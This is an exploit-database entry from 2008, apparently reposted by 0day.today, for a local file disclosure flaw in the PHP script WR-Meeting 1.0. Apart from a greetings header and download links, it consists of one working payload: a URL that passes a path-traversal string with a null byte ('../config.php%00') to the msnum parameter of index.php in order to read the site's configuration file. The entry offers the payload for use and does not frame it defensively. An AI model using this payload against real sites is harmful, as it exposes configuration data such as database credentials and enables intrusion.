id: 3033
date: 05/16/2008
title: WR-Meeting 1.0 (msnum) Local File Disclosure Vulnerability
author: Cr@zy_King
cves: 

==========================================================
WR-Meeting 1.0 (msnum) Local File Disclosure Vulnerability
==========================================================



| By Cr@zy_King 

^| GrtZ : TheKacak - Crackers_Child - Rmx - TR_ip - Eno7 - DreamTurk - KnocKout - The_Bekir and str0ke \

^| WR-Meeting v1.0 FI \

^| Down : http://www.wr-script.ru/ \

^| Demo : http://www.wr-script.ru/meeting/

^| Info : t4sc1zkr4L Best Of Bug Researches

^| Files : index.php \

^| Rfi : http://localhost/index.php?event=coment&msnum=../config.php%00 \

---------




#  0day.today [2023-03-23]  #